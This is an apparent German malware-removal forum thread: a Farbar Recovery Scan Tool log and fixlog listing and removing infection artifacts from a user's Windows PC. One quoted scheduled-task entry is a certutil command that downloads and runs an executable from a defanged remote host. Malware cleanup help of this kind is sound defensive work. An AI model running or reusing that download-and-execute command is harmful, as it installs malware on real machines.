Zugriff verweigert

Error: (06/01/2018 05:56:19 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "SPP-Benachrichtigungsdienst" wurde mit folgendem Fehler beendet:
Zugriff verweigert

Error: (06/01/2018 04:56:19 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "SPP-Benachrichtigungsdienst" wurde mit folgendem Fehler beendet:
Zugriff verweigert

Error: (06/01/2018 03:56:19 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "SPP-Benachrichtigungsdienst" wurde mit folgendem Fehler beendet:
Zugriff verweigert


CodeIntegrity:
===================================

Date: 2018-06-01 10:37:35.824
Description:
Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

Date: 2018-06-01 09:52:51.030
Description:
Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

Date: 2018-05-31 21:31:05.188
Description:
Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

Date: 2018-05-31 16:47:31.273
Description:
Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

Date: 2018-05-28 16:16:44.753
Description:
Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

Date: 2018-05-28 15:33:27.596
Description:
Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

Date: 2018-05-27 11:36:38.184
Description:
Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

Date: 2018-05-27 10:18:50.505
Description:
Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

==================== Speicherinformationen ===========================

Prozessor: Intel(R) Core(TM) i5-4460 CPU @ 3.20GHz
Prozentuale Nutzung des RAM: 31%
Installierter physikalischer RAM: 8132.21 MB
Verfügbarer physikalischer RAM: 5555.02 MB
Summe virtueller Speicher: 16262.6 MB
Verfügbarer virtueller Speicher: 12726.03 MB

==================== Laufwerke ================================

Drive c: () (Fixed) (Total:931.41 GB) (Free:779.37 GB) NTFS

\\?\Volume{c6be1ac3-efc6-11e7-8a05-806e6f6e6963}\ (System-reserviert) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 931.5 GB) (Disk ID: E8A87806)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=931.4 GB) - (Type=07 NTFS)

==================== Ende von Addition.txt ============================

moinbro 01.06.2018 09:51
FRST war mal wieder zu groß.

moinbro 01.06.2018 09:56
Fixlog

Code:
Entfernungsergebnis von Farbar Recovery Scan Tool (x64) Version: 16.05.2018 01
durchgeführt von Nico (01-06-2018 10:33:19) Run:2
Gestartet von C:\Users\Nico\Downloads
Geladene Profile: Nico (Verfügbare Profile: Nico)
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************
HKLM\...\Run: [JServicesManager] => C:\Program Files\SystemaRev\RevServicesX\runrev64.ex
HKLM-x32\...\Run: [JServicesManager] => C:\Program Files\SystemaRev\RevServicesX\runrev64.ex
C:\Program Files\SystemaRev
S2 WNetworkMgmt; "C:\ProgramData\Microsoft\Windows\WNetworkMgmt\WNetworkMgmt.exe"  [X]
C:\ProgramData\Microsoft\Windows\WNetworkMgmt
S3 FairplayKD; \??\C:\ProgramData\MTA San Andreas All\Common\temp\FairplayKD.sys [X]
S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 ] () <==== ACHTUNG (Null Byte Datei/Ordner)
R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 ] (Windows (R) Win 7 DDK provider) <==== ACHTUNG (Null Byte Datei/Ordner)
R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2018-05-27] () [Datei ist nicht signiert]
C:\Windows\System32\drivers\WinmonProcessMonitor.sys
C:\Windows\System32\drivers\WinmonFS.sys
C:\Windows\System32\drivers\Winmon.sys
2018-05-28 14:53 - 2018-05-28 14:53 - 000003824 _____ C:\Windows\System32\Tasks\MainPMgr
2018-05-28 14:53 - 2018-05-28 14:53 - 000003786 _____ C:\Windows\System32\Tasks\SystemUpdate64
2018-05-28 14:53 - 2018-05-28 14:53 - 000000000 ____D C:\Program Files\SystemaRev
2018-05-28 14:38 - 2018-05-28 14:42 - 000189686 _____ C:\Windows\ntbtlog.txt
2018-05-27 15:09 - 2018-05-27 15:09 - 000000000 ____D C:\ProgramData\SystemaRev
2018-05-27 14:57 - 2018-05-27 14:57 - 000004270 _____ C:\Windows\System32\Tasks\ReimageUpdater
2018-05-27 14:56 - 2018-05-28 14:40 - 000000150 _____ C:\Windows\Reimage.ini
2018-05-27 14:50 - 2018-05-27 14:50 - 000000000 ____D C:\Users\Nico\AppData\Roaming\ParetoLogic
2018-05-27 10:47 - 2018-05-27 11:15 - 000000000 ____D C:\Windows\SysWOW64\SSL
2018-05-27 10:47 - 2018-05-27 11:12 - 000929792 _____ C:\Users\Nico\AppData\Local\sham.db
2018-05-27 10:47 - 2018-05-27 10:53 - 000016080 _____ C:\Users\Nico\AppData\Local\InstallationConfiguration.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 007611392 _____ C:\Users\Nico\AppData\Local\agent.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 002136576 _____ (TODO: <Company name>) C:\Users\Nico\AppData\Local\Hottam.exe
2018-05-27 10:47 - 2018-05-27 10:47 - 001987748 _____ C:\Users\Nico\AppData\Local\Hottam.tst
2018-05-27 10:47 - 2018-05-27 10:47 - 001895382 _____ C:\Users\Nico\AppData\Local\Jaytip.bin
2018-05-27 10:47 - 2018-05-27 10:47 - 001620480 _____ C:\Windows\qcusolizqbhuglpw.qcus
2018-05-27 10:47 - 2018-05-27 10:47 - 000278510 _____ C:\Users\Nico\AppData\Local\VoltFinlab.bin
2018-05-27 10:47 - 2018-05-27 10:47 - 000140800 _____ C:\Users\Nico\AppData\Local\installer.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000126464 _____ C:\Users\Nico\AppData\Local\noah.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000070896 _____ C:\Users\Nico\AppData\Local\Config.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000018432 _____ C:\Users\Nico\AppData\Local\Main.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000015610 _____ C:\Windows\SysWOW64\findit.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000005568 _____ C:\Users\Nico\AppData\Local\md.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000000000 ____D C:\ProgramData\Logic Cramble
2018-05-27 09:58 - 2018-05-27 09:58 - 000000306 __RSH C:\Users\Nico\ntuser.pol
2018-05-27 09:58 - 2018-05-27 09:58 - 000000000 ____D C:\Users\Nico\AppData\Roaming\FastDataX
2018-05-27 09:57 - 2018-05-27 09:57 - 000000000 ____D C:\Users\Nico\AppData\Local\XService
2018-05-27 09:57 - 2018-05-27 09:57 - 000000000 ____D C:\Users\Nico\AppData\Local\Package Cache
2018-05-27 09:49 - 2018-05-27 09:49 - 000000000 ____D C:\Users\Nico\AppData\Roaming\EpicNet Inc
2018-05-27 09:48 - 2018-05-28 14:44 - 000003502 _____ C:\Windows\System32\Tasks\ScheduledUpdate
2018-05-27 09:48 - 2018-05-28 14:44 - 000003172 _____ C:\Windows\System32\Tasks\csrss
2018-05-27 09:48 - 2018-05-27 09:48 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
2018-05-27 09:48 - 2018-05-27 09:48 - 000004180 _____ C:\Windows\System32\Tasks\AncillaryFunctionauf
2018-05-27 09:48 - 2018-05-27 09:48 - 000000000 ____D C:\Users\Nico\AppData\Local\betterworld
2018-05-27 09:48 - 2018-03-24 14:51 - 002990080 _____ C:\Windows\system32\mcicda64.dll
2018-05-27 09:47 - 2018-05-28 16:07 - 000003702 _____ C:\Windows\System32\Tasks\WindowsRecoveryCleaner
2018-05-27 09:47 - 2018-05-28 14:44 - 000000034 _____ C:\Users\Public\Documents\{DE764086-1C0A-4DD3-90BA-0B93BDD794BE}
2018-05-27 09:47 - 2018-05-27 11:41 - 000003082 __RSH C:\ProgramData\ntuser.pol
2018-05-27 09:47 - 2018-05-27 10:22 - 000016718 _____ C:\Windows\System32\Tasks\Social Software
2018-05-27 09:47 - 2018-05-27 09:47 - 002032128 ___SH (Apple Inc.) C:\ProgramData\Iostream.exe
2018-05-27 09:47 - 2018-05-27 09:47 - 000043520 _____ C:\Users\Nico\AppData\Local\pfialx.dll
2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_OT
2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_FG
2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_AM
2018-05-27 09:47 - 2018-05-27 09:47 - 000004468 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_VJ
2018-05-27 09:47 - 2018-05-27 09:47 - 000004444 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_NM
2018-05-27 09:47 - 2018-05-27 09:47 - 000000000 ____D C:\Users\Public\Documents\XMUpdate
2018-05-27 09:47 - 2018-05-27 09:47 - 000000000 ____D C:\Program Files\Common Files\5ZNAWZD2EL69
2018-05-27 08:56 - 2018-05-27 08:56 - 000001285 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HowToRemove.lnk
2018-05-27 08:56 - 2018-05-27 08:56 - 000000000 ____D C:\Users\Nico\AppData\LocalLow\AMD
2018-05-26 14:03 - 2018-05-26 14:03 - 001592320 _____ C:\Windows\2045f4764aa9c27a5e23cd56fa5420a8.exe
2018-05-26 14:03 - 2018-05-26 14:03 - 000039584 _____ C:\Windows\uninstaller.dat
2018-05-25 12:23 - 2018-05-25 12:23 - 000000000 ___HD C:\Windows\msdownld.tmp
2018-05-27 09:47 - 2018-05-27 09:47 - 002032128 ___SH (Apple Inc.) C:\ProgramData\Iostream.exe
2018-05-25 01:01 - 2018-05-25 01:01 - 000000184 ____H () C:\Program Files (x86)\Common Files\new.bat
2018-05-27 10:47 - 2018-05-27 10:47 - 007611392 _____ () C:\Users\Nico\AppData\Local\agent.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000070896 _____ () C:\Users\Nico\AppData\Local\Config.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 002136576 _____ (TODO: <Company name>) C:\Users\Nico\AppData\Local\Hottam.exe
2018-05-27 10:47 - 2018-05-27 10:47 - 001987748 _____ () C:\Users\Nico\AppData\Local\Hottam.tst
2018-05-27 10:47 - 2018-05-27 10:53 - 000016080 _____ () C:\Users\Nico\AppData\Local\InstallationConfiguration.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000140800 _____ () C:\Users\Nico\AppData\Local\installer.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 001895382 _____ () C:\Users\Nico\AppData\Local\Jaytip.bin
2018-05-27 10:47 - 2018-05-27 10:47 - 000018432 _____ () C:\Users\Nico\AppData\Local\Main.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000005568 _____ () C:\Users\Nico\AppData\Local\md.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000126464 _____ () C:\Users\Nico\AppData\Local\noah.dat
2018-05-27 09:47 - 2018-05-27 09:47 - 000043520 _____ () C:\Users\Nico\AppData\Local\pfialx.dll
2018-02-05 20:57 - 2018-05-27 13:14 - 000007654 _____ () C:\Users\Nico\AppData\Local\Resmon.ResmonCfg
2018-05-27 10:47 - 2018-05-27 11:12 - 000929792 _____ () C:\Users\Nico\AppData\Local\sham.db
2018-05-27 10:47 - 2018-05-27 10:47 - 000032038 _____ () C:\Users\Nico\AppData\Local\uninstall_temp.ico
2018-05-27 10:47 - 2018-05-27 10:47 - 000278510 _____ () C:\Users\Nico\AppData\Local\VoltFinlab.bin
ShellIconOverlayIdentifiers: [{BFD98515-CD74-48A4-98E2-13D209E3EE4F}] -> {BFD98515-CD74-48A4-98E2-13D209E3EE4F} => C:\Windows\system32\mcicda64.dll [2018-03-24] ()
C:\Windows\system32\mcicda64.dll
Task: {099A856C-08D3-43C8-AD18-3D651763C816} - System32\Tasks\Social Software => C:\Windows\system32\rundll32.exe "C:\Program Files\Social Software\Social Software.dll",UjaAssDjw <==== ACHTUNG
C:\Program Files\Social Software
Task: {1622AF7B-53DD-4FEE-8BE9-907C9F57AA98} - System32\Tasks\SystemUpdate64 => C:\Program Files\SystemaRev\RevServicesX\SystemUpdate64.exe [2018-05-27] (SystemaRev)
C:\Program Files\SystemaRev
Task: {1913E8F8-F8A7-47F0-A2D5-DF77C0226E3E} - System32\Tasks\GoogleUpdateSecurityTaskMachine_FG => C:\Users\Nico\AppData\Local\Temp\36dd72f0d5c24801a35656466bd03b9d\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Local\Temp\36dd72f0d5c24801a35656466bd03b9d
Task: {28FB99D2-B4C3-4FD4-8949-3C860CE2DE24} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-05-27] () <==== ACHTUNG
Task: {412B9FDA-8C4C-40F4-A23C-696805866F9C} - System32\Tasks\AncillaryFunctionauf => C:\Program Files (x86)\nodejs\node.exe
C:\Program Files (x86)\nodejs
Task: {42767FB3-1423-4F1B-8F31-8B5936FA8F06} - System32\Tasks\GoogleUpdateSecurityTaskMachine_VJ => C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22
Task: {478261E4-F178-4CD8-8575-B8ACE5A0769E} - System32\Tasks\GoogleUpdateSecurityTaskMachine_AM => C:\Users\Nico\AppData\Local\Temp\be1f0849f130446da031e35271bfb3f7\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Local\Temp\be1f0849f130446da031e35271bfb3f7
Task: {6372E416-89E4-46ED-A9C3-6F1F6F797A15} - System32\Tasks\GoogleUpdateSecurityTaskMachine_NM => C:\Users\Nico\AppData\Roaming\6c3a24720f8d4be29080877f498e5aa9\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Roaming\6c3a24720f8d4be29080877f498e5aa9
Task: {66E7FCFF-AEE1-4593-AF28-7B81A60E82D7} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://dp.fastandcoolest.com/app/4/app.exe C:\Users\Nico\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Nico\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ACHTUNG
Task: {6E7DD5F8-0819-4296-8B92-EEA20358E2F3} - System32\Tasks\MainPMgr => powershell -ExecutionPolicy ByPass -File pm.ps1
Task: {AB4D74FB-B89A-4A74-982B-76AE532F4F7F} - System32\Tasks\GoogleUpdateSecurityTaskMachine_OT => C:\Users\Nico\AppData\Local\Temp\f4e669f936dd4a41b8d1678962b0fc78\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Local\Temp\f4e669f936dd4a41b8d1678962b0fc78
Task: {BAD80BEE-7129-4A3C-B9FA-580ED44A6159} - System32\Tasks\ReimageUpdater => C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe <==== ACHTUNG
C:\Program Files\Reimage
Task: {C6FD6CF5-A7E5-4DC3-A8A0-17D3A10CD175} - System32\Tasks\WindowsRecoveryCleaner => C:\ProgramData\Iostream.exe [2018-05-27] (Apple Inc.) <==== ACHTUNG
C:\ProgramData\Iostream.exe
ShortcutWithArgument: C:\Users\Nico\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
AlternateDataStreams: C:\ProgramData:NT [40]
AlternateDataStreams: C:\ProgramData:NT2 [552]
AlternateDataStreams: C:\Users\All Users:NT [40]
AlternateDataStreams: C:\Users\All Users:NT2 [552]
AlternateDataStreams: C:\ProgramData\Anwendungsdaten:NT [40]
AlternateDataStreams: C:\ProgramData\Anwendungsdaten:NT2 [552]
AlternateDataStreams: C:\ProgramData\Application Data:NT [40]
AlternateDataStreams: C:\ProgramData\Application Data:NT2 [552]
AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT [40]
AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT2 [552]
AlternateDataStreams: C:\Users\Nico\Anwendungsdaten:NT [40]
AlternateDataStreams: C:\Users\Nico\Anwendungsdaten:NT2 [552]
AlternateDataStreams: C:\Users\Nico\AppData\Roaming:NT [40]
AlternateDataStreams: C:\Users\Nico\AppData\Roaming:NT2 [552]
AlternateDataStreams: C:\Users\Public\AppData:CSM [472]
Unlock: C:\Windows\system32\Drivers\etc\hosts
C:\Windows\system32\Drivers\etc\hosts
Hosts:
VirusTotal: C:\Windows\system32\ntkrnlmp.exe
VirusTotal: C:\Windows\system32\osloader.exe
VirusTotal: C:\ProgramData\Microsoft\Windows\Audio\winamgr.exe
CMD: dir "%ProgramFiles%"
CMD: dir "%ProgramFiles(x86)%"
CMD: dir "%ProgramData%"
CMD: dir "%Appdata%"
CMD: dir "%LocalAppdata%"
CMD: dir "%CommonProgramFiles(x86)%"
CMD: dir "%CommonProgramW6432%"
CMD: dir "%UserProfile%"
CMD: dir "C:\"
ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
RemoveProxy:
CMD: ipconfig /flushdns
cmd: netsh winsock reset catalog
cmd: netsh advfirewall reset
cmd: netsh advfirewall set allprofiles state ON
cmd: Bitsadmin /Reset /Allusers
EmptyTemp:

*****************

"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\JServicesManager" => erfolgreich entfernt
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\JServicesManager" => erfolgreich entfernt
"C:\Program Files\SystemaRev" => nicht gefunden
WNetworkMgmt => Dienst nicht gefunden.
"C:\ProgramData\Microsoft\Windows\WNetworkMgmt" => nicht gefunden
"HKLM\System\CurrentControlSet\Services\FairplayKD" => erfolgreich entfernt
FairplayKD => Dienst erfolgreich entfernt
"HKLM\System\CurrentControlSet\Services\Synth3dVsc" => erfolgreich entfernt
Synth3dVsc => Dienst erfolgreich entfernt
"HKLM\System\CurrentControlSet\Services\tsusbhub" => erfolgreich entfernt
tsusbhub => Dienst erfolgreich entfernt
"HKLM\System\CurrentControlSet\Services\VGPU" => erfolgreich entfernt
VGPU => Dienst erfolgreich entfernt
Winmon => Dienst nicht gefunden.
WinmonFS => Dienst nicht gefunden.
WinmonProcessMonitor => Dienst nicht gefunden.
"C:\Windows\System32\drivers\WinmonProcessMonitor.sys" => nicht gefunden
"C:\Windows\System32\drivers\WinmonFS.sys" => nicht gefunden
"C:\Windows\System32\drivers\Winmon.sys" => nicht gefunden
"C:\Windows\System32\Tasks\MainPMgr" => nicht gefunden
"C:\Windows\System32\Tasks\SystemUpdate64" => nicht gefunden
"C:\Program Files\SystemaRev" => nicht gefunden
C:\Windows\ntbtlog.txt => erfolgreich verschoben
"C:\ProgramData\SystemaRev" => nicht gefunden
"C:\Windows\System32\Tasks\ReimageUpdater" => nicht gefunden
"C:\Windows\Reimage.ini" => nicht gefunden
"C:\Users\Nico\AppData\Roaming\ParetoLogic" => nicht gefunden
"C:\Windows\SysWOW64\SSL" => nicht gefunden
"C:\Users\Nico\AppData\Local\sham.db" => nicht gefunden
"C:\Users\Nico\AppData\Local\InstallationConfiguration.xml" => nicht gefunden
"C:\Users\Nico\AppData\Local\agent.dat" => nicht gefunden
"C:\Users\Nico\AppData\Local\Hottam.exe" => nicht gefunden
"C:\Users\Nico\AppData\Local\Hottam.tst" => nicht gefunden
"C:\Users\Nico\AppData\Local\Jaytip.bin" => nicht gefunden
"C:\Windows\qcusolizqbhuglpw.qcus" => nicht gefunden
"C:\Users\Nico\AppData\Local\VoltFinlab.bin" => nicht gefunden
C:\Users\Nico\AppData\Local\installer.dat => erfolgreich verschoben
"C:\Users\Nico\AppData\Local\noah.dat" => nicht gefunden
"C:\Users\Nico\AppData\Local\Config.xml" => nicht gefunden
"C:\Users\Nico\AppData\Local\Main.dat" => nicht gefunden
"C:\Windows\SysWOW64\findit.xml" => nicht gefunden
"C:\Users\Nico\AppData\Local\md.xml" => nicht gefunden
"C:\ProgramData\Logic Cramble" => nicht gefunden
C:\Users\Nico\ntuser.pol => erfolgreich verschoben
"C:\Users\Nico\AppData\Roaming\FastDataX" => nicht gefunden
"C:\Users\Nico\AppData\Local\XService" => nicht gefunden
C:\Users\Nico\AppData\Local\Package Cache => erfolgreich verschoben
"C:\Users\Nico\AppData\Roaming\EpicNet Inc" => nicht gefunden
"C:\Windows\System32\Tasks\ScheduledUpdate" => nicht gefunden
"C:\Windows\System32\Tasks\csrss" => nicht gefunden
"C:\Windows\system32\Drivers\WinmonProcessMonitor.sys" => nicht gefunden
C:\Windows\System32\Tasks\AncillaryFunctionauf => erfolgreich verschoben
"C:\Users\Nico\AppData\Local\betterworld" => nicht gefunden
"C:\Windows\system32\mcicda64.dll" => nicht gefunden
"C:\Windows\System32\Tasks\WindowsRecoveryCleaner" => nicht gefunden
C:\Users\Public\Documents\{DE764086-1C0A-4DD3-90BA-0B93BDD794BE} => erfolgreich verschoben
C:\ProgramData\ntuser.pol => erfolgreich verschoben
C:\Windows\System32\Tasks\Social Software => erfolgreich verschoben
"C:\ProgramData\Iostream.exe" => nicht gefunden
"C:\Users\Nico\AppData\Local\pfialx.dll" => nicht gefunden
"C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_OT" => nicht gefunden
"C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_FG" => nicht gefunden
"C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_AM" => nicht gefunden
"C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_VJ" => nicht gefunden
"C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_NM" => nicht gefunden
"C:\Users\Public\Documents\XMUpdate" => nicht gefunden
"C:\Program Files\Common Files\5ZNAWZD2EL69" => nicht gefunden
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HowToRemove.lnk => erfolgreich verschoben
C:\Users\Nico\AppData\LocalLow\AMD => erfolgreich verschoben
"C:\Windows\2045f4764aa9c27a5e23cd56fa5420a8.exe" => nicht gefunden
C:\Windows\uninstaller.dat => erfolgreich verschoben
C:\Windows\msdownld.tmp => erfolgreich verschoben
"C:\ProgramData\Iostream.exe" => nicht gefunden
"C:\Program Files (x86)\Common Files\new.bat" => nicht gefunden
"C:\Users\Nico\AppData\Local\agent.dat" => nicht gefunden
"C:\Users\Nico\AppData\Local\Config.xml" => nicht gefunden
"C:\Users\Nico\AppData\Local\Hottam.exe" => nicht gefunden
"C:\Users\Nico\AppData\Local\Hottam.tst" => nicht gefunden
"C:\Users\Nico\AppData\Local\InstallationConfiguration.xml" => nicht gefunden
"C:\Users\Nico\AppData\Local\installer.dat" => nicht gefunden
"C:\Users\Nico\AppData\Local\Jaytip.bin" => nicht gefunden
"C:\Users\Nico\AppData\Local\Main.dat" => nicht gefunden
"C:\Users\Nico\AppData\Local\md.xml" => nicht gefunden
"C:\Users\Nico\AppData\Local\noah.dat" => nicht gefunden
"C:\Users\Nico\AppData\Local\pfialx.dll" => nicht gefunden
"C:\Users\Nico\AppData\Local\Resmon.ResmonCfg" => nicht gefunden
"C:\Users\Nico\AppData\Local\sham.db" => nicht gefunden
"C:\Users\Nico\AppData\Local\uninstall_temp.ico" => nicht gefunden
"C:\Users\Nico\AppData\Local\VoltFinlab.bin" => nicht gefunden
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\{BFD98515-CD74-48A4-98E2-13D209E3EE4F}" => erfolgreich entfernt
HKLM\Software\Classes\CLSID\{BFD98515-CD74-48A4-98E2-13D209E3EE4F} => nicht gefunden
"C:\Windows\system32\mcicda64.dll" => nicht gefunden
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{099A856C-08D3-43C8-AD18-3D651763C816}" => erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{099A856C-08D3-43C8-AD18-3D651763C816}" => erfolgreich entfernt
"C:\Windows\System32\Tasks\Social Software" => nicht gefunden
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Social Software" => erfolgreich entfernt
"C:\Program Files\Social Software" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1622AF7B-53DD-4FEE-8BE9-907C9F57AA98} => nicht gefunden
"C:\Windows\System32\Tasks\SystemUpdate64" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SystemUpdate64 => nicht gefunden
"C:\Program Files\SystemaRev" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1913E8F8-F8A7-47F0-A2D5-DF77C0226E3E} => nicht gefunden
"C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_FG" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateSecurityTaskMachine_FG => nicht gefunden
"C:\Users\Nico\AppData\Local\Temp\36dd72f0d5c24801a35656466bd03b9d" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{28FB99D2-B4C3-4FD4-8949-3C860CE2DE24} => nicht gefunden
"C:\Windows\System32\Tasks\csrss" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\csrss => nicht gefunden
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{412B9FDA-8C4C-40F4-A23C-696805866F9C}" => erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{412B9FDA-8C4C-40F4-A23C-696805866F9C}" => erfolgreich entfernt
"C:\Windows\System32\Tasks\AncillaryFunctionauf" => nicht gefunden
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AncillaryFunctionauf" => erfolgreich entfernt
"C:\Program Files (x86)\nodejs" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{42767FB3-1423-4F1B-8F31-8B5936FA8F06} => nicht gefunden
"C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_VJ" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateSecurityTaskMachine_VJ => nicht gefunden
"C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{478261E4-F178-4CD8-8575-B8ACE5A0769E} => nicht gefunden
"C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_AM" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateSecurityTaskMachine_AM => nicht gefunden
"C:\Users\Nico\AppData\Local\Temp\be1f0849f130446da031e35271bfb3f7" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6372E416-89E4-46ED-A9C3-6F1F6F797A15} => nicht gefunden
"C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_NM" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateSecurityTaskMachine_NM => nicht gefunden
"C:\Users\Nico\AppData\Roaming\6c3a24720f8d4be29080877f498e5aa9" => nicht gefunden
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{66E7FCFF-AEE1-4593-AF28-7B81A60E82D7}" => erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{66E7FCFF-AEE1-4593-AF28-7B81A60E82D7} => nicht gefunden
